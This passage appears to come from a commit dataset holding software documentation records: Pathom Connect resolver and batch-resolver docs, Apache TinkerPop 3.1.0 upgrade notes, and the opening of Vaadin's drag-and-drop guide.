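For example, a resolver can require both parts of a customer's name in order to derive a full name (a minimal sketch; the `:customer\/...` attributes are illustrative and line up with the query example below):\n\n[source,clojure]\n----\n(pc\/defresolver customer-full-name [_ {:customer\/keys [first-name last-name]}]\n ; both attributes must be resolvable before this resolver can run\n {::pc\/input #{:customer\/first-name :customer\/last-name}\n ::pc\/output [:customer\/full-name]}\n {:customer\/full-name (str first-name \" \" last-name)})\n----\n\n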
As you have seen before, the only way to provide ad-hoc information to connect is using the ident query, but in the ident\nitself you can only provide one attribute at a time.\n\nSince version `2.2.0-beta11` the ident readers from connect (`ident-reader` and `open-ident-reader`) support adding extra\ncontext to the query using parameters. Let's say you want to load some customer data but want to reduce the number\nof resolvers called by providing some base information that you already have; you can issue a query like this:\n\n[source,clojure]\n----\n[{([:customer\/id 123] {:pathom\/context {:customer\/first-name \"Foo\" :customer\/last-name \"Bar\"}})\n [:customer\/full-name]}]\n----\n\n== Resolver builders\n\nSome common resolver patterns emerge from usage, and Pathom Connect provides\nhelpers for such cases; the next sections describe the helpers available in the Connect core.\n\n=== Alias resolvers\n\nSometimes you might want to make an alias, that is, create a resolver which just converts one\nname to another. For example:\n\n[source,clojure]\n----\n(pc\/defresolver alias-youtube-video [env {:user\/keys [youtube-video-url]}]\n {::pc\/input #{:user\/youtube-video-url}\n ::pc\/output [:youtube.video\/id]}\n {:youtube.video\/id youtube-video-url})\n----\n\nThe previous resolver will convert `:user\/youtube-video-url` to `:youtube.video\/id`. To make\nthat easy, Pathom provides some helpers:\n\n[source,clojure]\n----\n; this returns a resolver that works just like the previous resolver\n(def alias-youtube-video (pc\/alias-resolver :user\/youtube-video-url :youtube.video\/id))\n----\n\nIf you want to create an alias that goes in both directions, use `pc\/alias-resolver2`.\n\n=== Constant resolvers\n\nThis is a resolver that always returns a constant value for a given key. A common use\ncase is using it to set some default.\n\n[source,clojure]\n----\n; using helper\n(def answer-to-everything\n (pc\/constantly-resolver :douglas.adams\/answer-to-everything 42))\n\n; is equivalent to:\n(pc\/defresolver answer-to-everything [_ _]\n {::pc\/output [:douglas.adams\/answer-to-everything]}\n {:douglas.adams\/answer-to-everything 42})\n----\n\n=== Single attribute resolvers\n\nFor cases of a single transition from one attribute to another, you can use the\n`single-attr-resolver` helper:\n\n[source,clojure]\n----\n; conversion fn\n(defn fahrenheit->celcius [x]\n (-> x (- 32) (* 5\/9)))\n\n; resolver with helper\n(def f->c-resolver\n (pc\/single-attr-resolver :unit\/fahrenheit :unit\/celcius fahrenheit->celcius))\n\n; is equivalent to:\n(pc\/defresolver f->c-resolver [_ {:keys [unit\/fahrenheit]}]\n {::pc\/input #{:unit\/fahrenheit}\n ::pc\/output [:unit\/celcius]}\n {:unit\/celcius (fahrenheit->celcius fahrenheit)})\n----\n\nSometimes you also need to get some data from the environment; for those cases use\n`single-attr-resolver2`. The difference is that this one will send `env` and the input\nvalue as arguments to the provided function:\n\n[source,clojure]\n----\n(defn single-with-env [env value]\n (* value (::multiplier env)))\n\n(def env-demo-resolver\n (pc\/single-attr-resolver2 ::some-value ::other-value single-with-env))\n\n; is equivalent to\n(pc\/defresolver env-demo-resolver [env {::keys [some-value]}]\n {::pc\/input #{::some-value}\n ::pc\/output [::other-value]}\n {::other-value (single-with-env env some-value)})\n----\n\n== Parameters\n\nParameters enable another dimension of information to be added to the request. Params have\ndifferent semantics from inputs: inputs are more a `dependency` thing while params are\nmore like options. 
In practice, the main difference is that inputs are something Pathom\nwill try to look up and make available, while parameters must always be provided at\nquery time; they have no auto-resolution.\nCommon cases to use parameters are: pagination, sorting, filtering...\n\nLet's write a resolver that outputs a sequence of instruments which can optionally be sorted\nby a sorting criterion specified as a parameter.\n\n[source,clojure]\n----\n(pc\/defresolver instruments-list [env _]\n {::pc\/output [{::instruments [:instrument\/id :instrument\/brand\n :instrument\/type :instrument\/price]}]}\n (let [{:keys [sort]} (-> env :ast :params)] ; <1>\n {::instruments (cond->> instruments\n (keyword? sort) (sort-by sort))}))\n----\n\n<1> Pulls the parameters from the environment\n\nThen we can run queries like:\n\n[source,clojure]\n----\n[(::instruments {:sort :instrument\/brand})]\n[(::instruments {:sort :instrument\/price})]\n[(::instruments {:sort :instrument\/type})]\n\n; params with join\n\n[{(::instruments {:sort :instrument\/price})\n [:instrument\/id\n :instrument\/brand]}]\n----\n\nTry it out:\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.parameters\" class=\"loader\">\n[(::instruments {:sort :instrument\/price})]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\n== N+1 Queries and Batch resolvers\n\nWhen you have a to-many relation that is being resolved by a parser, you will typically end up with a single query that\nfinds the \"IDs\", and then `N` more queries to fill in the details of each item in the sequence. This is known as the\n`N+1` problem, and can be a source of significant performance problems.\n\nInstead of running a resolver once for each item on the list, the idea for solving this problem is to send all the inputs\nas a sequence, so the resolver can use a more optimal implementation to handle multiple items. When this happens,\nwe call it a batch resolver. For example, let's take a look at the following demo:\n\n[source,clojure]\n----\ninclude::example$com\/wsscode\/pathom\/book\/connect\/batch.cljs[]\n----\n\nTry the demo:\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.batch\" class=\"loader\">\n[{:items [:number-added]}]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\n
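The resolver in this demo is essentially a single-input resolver with an artificial one second delay per call, roughly like this (a sketch; the actual demo code lives in the included file):\n\n[source,clojure]\n----\n(pc\/defresolver slow-resolver [_ {:keys [number]}]\n {::pc\/input #{:number}\n ::pc\/output [:number-added]}\n (go\n ; one sleep per item: with N items this cascades into N seconds\n (async\/<! (async\/timeout 1000))\n {:number-added (inc number)}))\n----\n\n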
NOTE: This demo is using Pathom async parsers. The resolvers in async parsers can return channels that (eventually)\nresolve to the result, which is why you see `go` blocks in the code. See <<AsyncParsing, Async Parsing>> for more details.\nWe use them in this demo so we can \"sleep\" in a Javascript environment to mimic overhead in processing.\nIn the rest of the book we recommend using the parallel parser; the reason to use the async parser in this demo is\nthat it more easily demonstrates the `N+1` issue.\n\nYou can see in the tracer that it took one second for each entry, a clear cascade,\nbecause it had to call the `:number-added` resolver once for each item.\n\nWe can improve on that by turning this into a batch resolver, like this:\n\n[source,clojure]\n----\ninclude::example$com\/wsscode\/pathom\/book\/connect\/batch2.cljs[]\n----\n\nTry the demo:\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.batch2\" class=\"loader\">\n[{:items [:number-added]}]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\n
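If you can't open the included file, the batched resolver is roughly shaped like this (a sketch reconstructed from the descriptions in this section; note the `::pc\/batch? true` mark and the manual check for a sequential input):\n\n[source,clojure]\n----\n(pc\/defresolver slow-resolver [_ input]\n {::pc\/input #{:number}\n ::pc\/output [:number-added]\n ; tell Pathom this resolver can take a sequence of inputs\n ::pc\/batch? true}\n (go\n ; a single one second sleep for the whole batch\n (async\/<! (async\/timeout 1000))\n (if (sequential? input)\n ; batch case: input is a sequence of maps, answer with a sequence\n (mapv (fn [v] {:number-added (inc (:number v))}) input)\n ; single case: input is just one map\n {:number-added (inc (:number input))})))\n----\n\n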
Note that this time the sleep of one second only happened once. This is because when Pathom is processing a list and the\nresolver supports batching, the resolver will get all the inputs in a single call, so your batch resolver can get all\nthe items in a single iteration. The results will be cached back for each entry, so the other items hit the\ncache instead of calling the resolver again.\n\n=== Batch transforms [[resolver-batch-transform]]\n\nStarting with version `2.2.0`, Pathom adds some helpers to facilitate the creation of batch resolvers using the Pathom\n<<connect-transform,transform>> facilities.\n\nIn the previous example we manually detected whether the input was a sequence; the API is made this way so the resolver\nkeeps compatibility with the regular resolver API, but it is often easier if you get a consistent input (always a sequence,\nfor example). We can enforce this using a transform:\n\n[source,clojure]\n----\n(pc\/defresolver slow-resolver [_ input]\n {::pc\/input #{:number}\n ::pc\/output [:number-added]\n ; use the transform, note we removed ::pc\/batch? true, that's because the transform\n ; will add this for us\n ::pc\/transform pc\/transform-batch-resolver}\n (go\n (async\/<! (async\/timeout 1000))\n ; no need to detect sequence, it is always a sequence now\n (mapv (fn [v] {:number-added (inc (:number v))}) input)))\n----\n\nTry the demo:\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.batch3\" class=\"loader\">\n[{:items [:number-added]}]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\nAnother helper Pathom provides transforms a serial resolver, which would run items one by one, into a batch resolver\nthat runs at concurrency `n`.\n\n[source,clojure]\n----\n(pc\/defresolver slow-resolver [_ {:keys [number]}]\n {::pc\/input #{:number}\n ::pc\/output [:number-added]\n ; set auto-batch with concurrency of 10\n ::pc\/transform (pc\/transform-auto-batch 10)}\n (go\n (async\/<! (async\/timeout 1000))\n ; dealing with the single case, as in the first example we did on batch\n {:number-added (inc number)}))\n----\n\nTry the demo:\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.transform-auto-batch\" class=\"loader\">\n[{:items [:number-added]}]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\nNote that this time we did call the resolver fn multiple times, but in parallel. How this impacts\nperformance will vary case by case, so I suggest giving some thought to the best\nstrategy for each situation individually.\n\n=== Aligning results\n\nOftentimes when you make a batch request to some service\/API the results won't come back in\nthe same order as the request, and the count might not match if some of the items\nin the request were invalid. To facilitate coding these cases, Pathom provides\na helper to sort the results back correctly; for more info check the docs for\nlink:https:\/\/cljdoc.org\/d\/com.wsscode\/pathom\/CURRENT\/api\/com.wsscode.pathom.connect#batch-restore-sort[batch-restore-sort on cljdoc].\n\n
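To give an idea of its shape, here is a minimal sketch of using that helper inside a batch resolver (the `fetch-users!` function and the `:user\/...` attributes are hypothetical):\n\n[source,clojure]\n----\n(pc\/defresolver user-by-id [_ inputs]\n {::pc\/input #{:user\/id}\n ::pc\/output [:user\/name]\n ; guarantee inputs arrive as a sequence, as shown above\n ::pc\/transform pc\/transform-batch-resolver}\n (let [results (fetch-users! (mapv :user\/id inputs))] ; order\/count may not match inputs\n ; each result map must contain :user\/id so it can be matched back;\n ; sort the results so each output lines up with its original input\n (pc\/batch-restore-sort {::pc\/inputs inputs\n ::pc\/key :user\/id}\n results)))\n----\n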
","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e9e580585e9834005bd8e0e67e72f0d4f205564b","subject":"Update upgrade docs to include date and link to changelog.","message":"Update upgrade docs to include date and link to changelog.\n","repos":"samiunn\/incubator-tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop,artem-aliev\/tinkerpop,n-tran\/incubator-tinkerpop,robertdale\/tinkerpop,BrynCooke\/incubator-tinkerpop,gdelafosse\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,newkek\/incubator-tinkerpop,velo\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,newkek\/incubator-tinkerpop,apache\/tinkerpop,apache\/tinkerpop,mike-tr-adamson\/incubator-tinkerpop,robertdale\/tinkerpop,apache\/incubator-tinkerpop,newkek\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,PommeVerte\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,robertdale\/tinkerpop,samiunn\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,jorgebay\/tinkerpop,n-tran\/incubator-tinkerpop,apache\/incubator-tinkerpop,PommeVerte\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,n-tran\/incubator-tinkerpop,velo\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,apache\/incubator-tinkerpop,PommeVerte\/incubator-tinkerpop,gdelafosse\/incubator-tinkerpop,jorgebay\/tinkerpop,BrynCooke\/incubator-tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop,velo\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,jorgebay\/tinkerpop,gdelafosse\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop","old_file":"docs\/src\/upgrade-release-3.1.x-incubating.asciidoc","new_file":"docs\/src\/upgrade-release-3.1.x-incubating.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. 
See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\nTinkerPop 3.1.0\n===============\n\nimage::https:\/\/raw.githubusercontent.com\/apache\/incubator-tinkerpop\/master\/docs\/static\/images\/gremlin-gangster.png[width=225]\n\n*A 187 On The Undercover Gremlinz*\n\nTinkerPop 3.1.0\n---------------\n\n*Release Date: November 16, 2015*\n\nPlease see the link:https:\/\/github.com\/apache\/incubator-tinkerpop\/blob\/3.1.0-incubating\/CHANGELOG.asciidoc#tinkerpop-310-release-date-november-16-2015[changelog] for a complete list of all the modifications that are part of this release.\n\nAdditional upgrade information can be found here:\n\n* <<_tinkerpop_3_0_2,TinkerPop 3.0.2>>\n* <<_tinkerpop_3_0_1,TinkerPop 3.0.1>>\n\nUpgrading for Users\n~~~~~~~~~~~~~~~~~~~\n\nShading Jackson\n^^^^^^^^^^^^^^^\n\nThe Jackson library is now shaded to `gremlin-shaded`, which will allow Jackson to version independently without\nbreaking compatibility with dependent libraries or with those who depend on TinkerPop. The downside is that if a\nlibrary depends on TinkerPop and uses the Jackson classes, those classes will no longer exist with the standard\nJackson package naming. They will have to be shifted as follows:\n\n* `org.objenesis` becomes `org.apache.tinkerpop.shaded.objenesis`\n* `com.esotericsoftware.minlog` becomes `org.apache.tinkerpop.shaded.minlog`\n* `com.fasterxml.jackson` becomes `org.apache.tinkerpop.shaded.jackson`\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-835[TINKERPOP3-835]\n\nPartitionStrategy and VertexProperty\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n`PartitionStrategy` now supports partitioning within `VertexProperty`. The `Graph` needs to be able to support\nmeta-properties for this feature to work.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-333[TINKERPOP3-333]\n\nGremlin Server and Epoll\n^^^^^^^^^^^^^^^^^^^^^^^^\n\nGremlin Server provides a configuration option to turn on support for Netty\nlink:http:\/\/netty.io\/wiki\/native-transports.html[native transport] on Linux, which has been shown to help improve\nperformance.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-901[TINKERPOP3-901]\n\nRebindings Deprecated\n^^^^^^^^^^^^^^^^^^^^^\n\nThe notion of \"rebindings\" has been deprecated in favor of the term \"aliases\". 
Alias is a better and more intuitive\nterm than rebindings, which should make it easier for newcomers to understand what they are for.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-913[TINKERPOP3-913],\nlink:http:\/\/tinkerpop.incubator.apache.org\/docs\/3.1.0-incubating\/#_aliases[Reference Documentation - Aliases]\n\nConfigurable Driver Channelizer\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe Gremlin Driver now allows the `Channelizer` to be supplied as a configuration, which means that custom\nimplementations may be supplied.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-680[TINKERPOP3-680]\n\nGraphMLReader and Strict Option\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe `GraphMLReader` now has a `strict` option on the `Builder` so that if a data type for a value is invalid in some\nway, GraphMLReader will simply skip that problem value. In that way, it is a bit more forgiving than before, especially\nwith empty data.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-756[TINKERPOP3-756]\n\nTransaction.close() Default Behavior\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe default behavior of `Transaction.close()` is to rollback the transaction. This is in contrast to previous versions\nwhere the default behavior was commit. Using rollback as the default should be thought of as a safer approach\nto closing, where a user must now explicitly call `commit()` to persist their mutations.\n\nSee link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-805[TINKERPOP3-805] for more information.\n\nThreadLocal Transaction Settings\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe `Transaction.onReadWrite()` and `Transaction.onClose()` settings now need to be set for each thread (if another\nbehavior than the default is desired). This is particularly relevant for gremlin-server users that may be changing these settings via scripts.\nIf the settings are changed for a sessionless request they will now only apply to that one request. If the settings are\nchanged for an in-session request they will now only apply to all future requests made in the scope of that session.\n\nSee link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-885[TINKERPOP3-885]\n\nHadoop-Gremlin\n^^^^^^^^^^^^^^\n\n* Hadoop1 is no longer supported. Hadoop2 is now the only supported Hadoop version in TinkerPop.\n* Spark and Giraph have been split out of Hadoop-Gremlin into their own respective packages (Spark-Gremlin and Giraph-Gremlin).\n* The directory where application jars are stored in HDFS is now `hadoop-gremlin-x.y.z-libs`.\n** This versioning is important so that cross-version TinkerPop use does not cause jar conflicts.\n\nSee link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-616[TINKERPOP3-616]\n\nSpark-Gremlin\n^^^^^^^^^^^^^\n\n* Providers that wish to reuse a graphRDD can leverage the new `PersistedInputRDD` and `PersistedOutputRDD`.\n** This allows the graphRDD to avoid serialization into HDFS for reuse. Be sure to enable the persisted `SparkContext` (see documentation).\n\nSee link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-868[TINKERPOP3-868],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-925[TINKERPOP3-925]\n\nTinkerGraph Serialization\n^^^^^^^^^^^^^^^^^^^^^^^^^\n\nTinkerGraph is serializable over Gryo, which means that it can be shipped over the wire from Gremlin Server. 
This\nfeature can be useful when working with remote subgraphs.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-728[TINKERPOP3-728]\n\nDeprecation in TinkerGraph\n^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe `public static String` configurations have been renamed. The old `public static` variables have been deprecated.\nIf the deprecated variables were being used, then convert to the replacements as soon as possible.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-926[TINKERPOP3-926]\n\nDeprecation in Gremlin-Groovy\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe closure wrapper classes `GFunction`, `GSupplier`, `GConsumer` have been deprecated. In Groovy, a closure can be\nspecified using `as Function` and thus, these wrappers are not needed. Also, the `GremlinExecutor.promoteBindings()`\nmethod which was previously deprecated has been removed.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-879[TINKERPOP3-879],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-897[TINKERPOP3-897]\n\nGephi Traversal Visualization\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe process for visualizing a traversal has been simplified. There is no longer a need to \"name\" steps that will\nrepresent visualization points for Gephi. It is possible to just \"configure\" a `visualTraversal` in the console:\n\n[source,text]\ngremlin> :remote config visualTraversal graph vg\n\nwhich creates a special `TraversalSource` from `graph` called `vg`. The traversals created from `vg` can be used\nto `:submit` to Gephi.\n\nSee: link:http:\/\/tinkerpop.incubator.apache.org\/docs\/3.1.0-SNAPSHOT\/#gephi-plugin[Reference Documentation - Gephi]\n\nAlterations to GraphTraversal\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThere were a number of changes to `GraphTraversal`. Many of the changes came by way of deprecation, but some semantics\nhave changed as well:\n\n* `ConjunctionStrategy` has been renamed to `ConnectiveStrategy` (no other behaviors changed).\n* `ConjunctionP` has been renamed to `ConnectiveP` (no other behaviors changed).\n* `DedupBijectionStrategy` has been renamed (and made more effective) as `FilterRankingStrategy`.\n* The `GraphTraversal` mutation API has changed significantly with all previous methods being supported but deprecated.\n** The general pattern used now is `addE('knows').from(select('a')).to(select('b')).property('weight',1.0)`.\n* The `GraphTraversal` sack API has changed with all previous methods being supported but deprecated.\n** The old `sack(mult,'weight')` is now `sack(mult).by('weight')`.\n* `GroupStep` has been redesigned such that there is now only a key- and value-traversal. No more reduce-traversal.\n** The previous `group()`-methods have been renamed to `groupV3d0()`. To immediately upgrade, rename all your `group()`-calls to `groupV3d0()`.\n** To migrate to the new `group()`-methods, what was `group().by('age').by(outE()).by(sum(local))` is now `group().by('age').by(outE().sum())`.\n* There was a bug in `fold()`, where if a bulked traverser was provided, the traverser was only represented once.\n** This bug fix might cause a breaking change to a user query if the non-bulk behavior was being counted on. If so, use `dedup()` prior to `fold()`.\n* Both `GraphTraversal.mapKeys()` and `GraphTraversal.mapValues()` have been deprecated.\n** Use `select(keys)` and `select(values)`. However, note that `select()` will not unroll the keys\/values. 
Thus, `mapKeys()` => `select(keys).unfold()`.\n* The data type of `Operator` enums will now always be the highest common data type of the two given numbers, rather than the data type of the first number, as it had been before.\n\nAliasing Remotes in the Console\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe `:remote` command in Gremlin Console has a new `alias` configuration option. This `alias` option allows\nspecification of a set of key\/value alias\/binding pairs to apply to the remote. In this way, it becomes possible\nto refer to a variable on the server as something other than its server-side name for the purpose of the submitted\nscript. For example, once a `:remote` is created, this command:\n\n[source,text]\n:remote alias x g\n\nwould allow \"g\" on the server to be referred to as \"x\".\n\n[source,text]\n:> x.E().label().groupCount()\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-914[TINKERPOP3-914]\n\nUpgrading for Providers\n~~~~~~~~~~~~~~~~~~~~~~~\n\nIMPORTANT: It is recommended that providers also review all the upgrade instructions specified for users. Many of the\nchanges there may prove important for the provider's implementation.\n\nAll providers should be aware that Jackson is now shaded to `gremlin-shaded`, which could represent a breaking change if\nthere was usage of the dependency by way of TinkerPop; a direct dependency on Jackson may be required on the\nprovider's side.\n\nGraph System Providers\n^^^^^^^^^^^^^^^^^^^^^^\n\nGraphStep Alterations\n+++++++++++++++++++++\n\n* `GraphStep` is no longer in the `sideEffect`-package, but now in the `map`-package, as traversals support mid-traversal `V()`.\n* Traversals now support mid-traversal `V()`-steps. Graph system providers should ensure that a mid-traversal `V()` can leverage any suitable index.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-762[TINKERPOP3-762]\n\nDecomposition of AbstractTransaction\n++++++++++++++++++++++++++++++++++++\n\nThe `AbstractTransaction` class has been abstracted into two different classes supporting two different modes of\noperation: `AbstractThreadLocalTransaction` and `AbstractThreadedTransaction`, where the former should be used when\nsupporting `ThreadLocal` transactions and the latter for threaded transactions. Of course, providers may still\nchoose to build their own implementation on `AbstractTransaction` itself or simply implement the `Transaction`\ninterface.\n\nThe `AbstractTransaction` gains the following methods to potentially implement (though default implementations\nare supplied in `AbstractThreadLocalTransaction` and `AbstractThreadedTransaction`):\n\n* `doReadWrite` that should execute the read-write consumer.\n* `doClose` that should execute the close consumer.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-765[TINKERPOP3-765],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-885[TINKERPOP3-885]\n\nTransaction.close() Default Behavior\n++++++++++++++++++++++++++++++++++++\n\nThe default behavior for `Transaction.close()` is to rollback the transaction and is enforced by tests, which\npreviously asserted the opposite (i.e. commit on close). 
These tests have been renamed to suit the new semantics:\n\n* `shouldCommitOnCloseByDefault` became `shouldCommitOnCloseWhenConfigured`\n* `shouldRollbackOnCloseWhenConfigured` became `shouldRollbackOnCloseByDefault`\n\nIf these tests were referenced in an `OptOut`, then their names should be updated.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-805[TINKERPOP3-805]\n\nGraph Traversal Updates\n+++++++++++++++++++++++\n\nThere were numerous changes to the `GraphTraversal` API. Nearly all changes are backwards compatible with respective\n\"deprecated\" annotations. Please review the respective updates specified in the \"Graph System Users\" section.\n\n* `GraphStep` is no longer in the `sideEffect` package. It is now in the `map` package.\n* Make sure mid-traversal `GraphStep` calls are folding `HasContainers` in for index-lookups.\n* Think about copying `TinkerGraphStepStrategyTest` for your implementation so you know folding is happening correctly.\n\nElement Removal\n+++++++++++++++\n\n`Element.Exceptions.elementAlreadyRemoved` has been deprecated and test enforcement for consistency has been removed.\n Providers are free to deal with deleted elements as they see fit.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-297[TINKERPOP3-297]\n\nVendorOptimizationStrategy Rename\n+++++++++++++++++++++++++++++++++\n\nThe `VendorOptimizationStrategy` has been renamed to `ProviderOptimizationStrategy`. This renaming is consistent\nwith revised terminology for what were formerly referred to as \"vendors\".\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-876[TINKERPOP3-876]\n\nGraphComputer Updates\n+++++++++++++++++++++\n\n`GraphComputer.configure(String key, Object value)` is now a method (with default implementation).\nThis allows the user to specify engine-specific parameters to the underlying OLAP system. These parameters are not intended\nto be cross-engine supported. Moreover, if there are no parameters that can be altered (beyond the standard `GraphComputer`\nmethods), then the provider's `GraphComputer` implementation should simply return and do nothing.\n\nDriver Providers\n^^^^^^^^^^^^^^^^\n\nAliases Parameter\n+++++++++++++++++\n\nThe \"rebindings\" argument to the \"standard\" `OpProcessor` has been renamed to \"aliases\". While \"rebindings\" is still\nsupported, it is recommended that the upgrade to \"aliases\" be made as soon as possible, as support will be removed in\nthe future. Gremlin Server will not accept both parameters at the same time - a request must contain either one\nparameter or the other if either is supplied.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-913[TINKERPOP3-913]\n\nThreadLocal Transaction Settings\n++++++++++++++++++++++++++++++++\n\nIf a driver configures the `Transaction.onReadWrite()` or `Transaction.onClose()` settings, note that these settings no\nlonger apply to all future requests. If the settings are changed for a sessionless request they will only apply to\nthat one request. If the settings are changed from an in-session request they will only apply to all future requests\nmade in the scope of that session.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-885[TINKERPOP3-885]","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. 
","old_contents":"","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"39b2142869f8b890eb451ae68ba0ad19bbb0ff63","subject":"Update advanced-dragndrop.asciidoc","message":"Update advanced-dragndrop.asciidoc\n\nError on formatting at line 299\n\nChange-Id: I8ca16880dd77def9e01b5d51c3186cb0ed4fba41\n","repos":"asashour\/framework,peterl1084\/framework,Legioth\/vaadin,kironapublic\/vaadin,jdahlstrom\/vaadin.react,Legioth\/vaadin,asashour\/framework,mstahv\/framework,jdahlstrom\/vaadin.react,Darsstar\/framework,jdahlstrom\/vaadin.react,Darsstar\/framework,mstahv\/framework,kironapublic\/vaadin,Darsstar\/framework,Darsstar\/framework,asashour\/framework,peterl1084\/framework,kironapublic\/vaadin,mstahv\/framework,peterl1084\/framework,mstahv\/framework,kironapublic\/vaadin,asashour\/framework,jdahlstrom\/vaadin.react,mstahv\/framework,kironapublic\/vaadin,asashour\/framework,jdahlstrom\/vaadin.react,peterl1084\/framework,Legioth\/vaadin,peterl1084\/framework,Legioth\/vaadin,Legioth\/vaadin,Darsstar\/framework","old_file":"documentation\/advanced\/advanced-dragndrop.asciidoc","new_file":"documentation\/advanced\/advanced-dragndrop.asciidoc","new_contents":"---\ntitle: Drag and Drop\norder: 12\nlayout: page\n---\n\n[[advanced.dragndrop]]\n= Drag and Drop\n\n(((\"Drag and Drop\", id=\"term.advanced.dragndrop\", range=\"startofrange\")))\n\n\nDragging an object from one location to another by grabbing it with the mouse,\nholding the mouse button pressed, and then releasing the button to \"drop\" it in\nthe other location is a common way to move, copy, or associate objects. For\nexample, most operating systems allow dragging and dropping files between\nfolders, or dragging a document onto a program to open it. In Vaadin, it is\npossible to drag and drop components and parts of certain components.\n\nDragged objects, or __transferables__, are essentially data objects. You can\ndrag and drop rows in [classname]#Table# and nodes in [classname]#Tree#\ncomponents, either within or between the components. You can also drag entire\ncomponents by wrapping them inside [classname]#DragAndDropWrapper#.\n\nDragging starts from a __drag source__, which defines the transferable.\nTransferables implement the [classname]#Transferable# interface. For trees and\ntables, which are bound to [classname]#Container# data sources, a node or row\ntransferable is a reference to an [classname]#Item# in the Vaadin Data Model.\nDragged components are referenced with a [classname]#WrapperTransferable#.\nStarting dragging does not require any client-server communication; you only\nneed to enable dragging. All drag and drop logic occurs in two operations:\ndetermining (__accepting__) where dropping is allowed and actually dropping.\nDrops can be done on a __drop target__, which implements the\n[classname]#DropTarget# interface.
